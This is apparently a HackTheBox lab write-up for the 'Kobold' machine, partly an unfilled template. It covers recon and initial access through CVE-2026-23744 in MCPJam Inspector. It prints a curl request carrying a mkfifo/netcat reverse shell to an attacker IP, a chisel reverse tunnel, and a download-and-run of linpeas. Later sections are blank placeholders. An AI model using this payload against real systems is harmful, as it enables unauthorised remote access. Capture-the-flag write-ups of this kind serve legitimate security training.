← back to all writeups

Kobold

Linux Easy Pwned: 2026-06-15

Machine Info

FieldDetails
Machine NameName
OSLinux
DifficultyEasy
StatusUser pwned

Tools Used


Summary

Brief summary of the machine, attack path, and key vulnerabilities exploited.


Reconnaissance

Initial Scan (NMAP)

Initial recon reveals that the website has 443 ports open and running ssl. Scan also tells us that there are more than one DNS (*.kobold.htb wildcard is mentioned).

┌──(kali㉿kali)-[~/HTB/Kobold/recon]
└─$ nmap -sC -sV -A 10.129.100.174 -oN scan.txt
Starting Nmap 7.98 ( https://nmap.org ) at 2026-06-03 13:03 -0400
Nmap scan report for kobold.htb (10.129.100.174)
Host is up (0.19s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 8c:45:12:36:03:61:de:0f:0b:2b:c3:9b:2a:92:59:a1 (ECDSA)
|_  256 d2:3c:bf:ed:55:4a:52:13:b5:34:d2:fb:8f:e4:93:bd (ED25519)
80/tcp  open  http     nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to https://kobold.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
443/tcp open  ssl/http nginx 1.24.0 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
|_http-title: Kobold Operations Suite
| ssl-cert: Subject: commonName=kobold.htb
| Subject Alternative Name: DNS:kobold.htb, DNS:*.kobold.htb
| Not valid before: 2026-03-15T15:08:55
|_Not valid after:  2125-02-19T15:08:55
|_http-server-header: nginx/1.24.0 (Ubuntu)
| tls-alpn: 
|   http/1.1
|   http/1.0
|_  http/0.9
---SNIP---

Open Ports:

PortServiceVersionNotes
22SSH
80http
443https
3552Arcanev1.13.0Vulnerable to CVE-2026-23520 (Discovered later after foothold is created).

Web Enumeration (if applicable)

Running a gobuster scan for subdomains reveals that MCPJAM v1.4.2 service is running on mcp.kobold.htb subdomain.

┌──(kali㉿kali)-[~/HTB/Kobold]
└─$ gobuster vhost -u https://kobold.htb \
  -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  --append-domain \
  -k \
  -t 10 \
  --timeout 10s \
  2>/dev/null
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                       https://kobold.htb
[+] Method:                    GET
[+] Threads:                   10
[+] Wordlist:                  /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:                gobuster/3.8.2
[+] Timeout:                   10s
[+] Append Domain:             true
[+] Exclude Hostname Length:   false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
mcp.kobold.htb Status: 200 [Size: 466]

===============================================================
Finished
===============================================================

Vulnerability Identification

Identified Technologies

TechnologyVersionNotes
MCPJAM Inspectorv1.4.2Critical RCE vulnerabilitiy (CVE-2026-23744)

CVEs / Vulnerabilities Identified

CVEDescriptionSeverity
CVE-2026-23744MCPJam inspector <= 1.4.2 contains a remote code execution caused by crafted HTTP requests triggering MCP server installation, letting remote attackers execute arbitrary code, exploit requires network access to the listening interface.Critical

Initial Foothold / Initial Access

CVE-2026-23744

Description: To exploit the vulnerability, this proof of concept was used as a reference. We used the same command in linux format to trigger a reverse shell

Sending the following command while keeping the netcat listening for 4444 gives us initial foothold

┌──(kali㉿kali)-[~/HTB/Kobold/CVE-2026-23744]
└─$ curl -sk -X POST https://mcp.kobold.htb/api/mcp/connect \
  -H "Content-Type: application/json" \
  -d '{"serverConfig":{"command":"/bin/sh","args":["-c","rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 4444 >/tmp/f"],"env":{}},"serverId":"pwned"}'

<html>
<head><title>504 Gateway Time-out</title></head>
<body>
<center><h1>504 Gateway Time-out</h1></center>
<hr><center>nginx/1.24.0 (Ubuntu)</center>
</body>
</html>
──(kali㉿kali)-[~/HTB/Kobold]
└─$ nc -lvnp 4444    
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.129.100.174] 56532
/bin/sh: 0: can't access tty; job control turned off

Post-Exploitation

System Enumeration

Further enumeration within the foothold reveals that Arcane 1.13.0 is running internally on port 3552.

$ ss -tuln
Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:PortProcess
---SNIP---        
tcp   LISTEN 0      4096       127.0.0.1:8080       0.0.0.0:*          
tcp   LISTEN 0      511          0.0.0.0:443        0.0.0.0:*          
tcp   LISTEN 0      511          0.0.0.0:80         0.0.0.0:*          
tcp   LISTEN 0      4096         0.0.0.0:22         0.0.0.0:*          
tcp   LISTEN 0      4096       127.0.0.1:37301      0.0.0.0:*               
tcp   LISTEN 0      4096               *:3552             *:* 

We can reverse the ports back to our client machine to listen to them using chisel.

On local machine.

kali㉿kali)-[~/ScriptsTools]
└─$ ./chisel server -p 9000 --reverse
2026/06/03 16:32:20 server: Reverse tunnelling enabled

On foothold machine after sending the chisel script to the foothold.

 ./chisel client 10.10.14.2:9000 R:3552:127.0.0.1:3552
2026/06/03 20:39:10 client: Connecting to ws://10.10.14.2:9000
2026/06/03 20:39:12 client: Connected (Latency 195.555954ms)

Identified Technologies

TechnologyVersionNotes
Arcanev1.13.0NA

CVE-2026-23520

Credential Discovery

# look for credentials

Credentials Found:

UsernamePasswordHashService

Lateral Movement (if applicable)

Steps:

# lateral movement commands

User Flag

cat ~/user.txt

{{user_flag}}

Privilege Escalation

Enumeration

# transfer and run linpeas
curl http://{{attack_ip}}:8000/linpeas.sh -o /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh

Key Findings:

-

-

-

Vulnerability: {{privesc_vuln}}

Description:

Steps:

# privilege escalation commands

Result:

whoami
# root

Root Flag

---CENSORED---

Trophy

Completed as part of HackTheBox practice in a legal, controlled environment.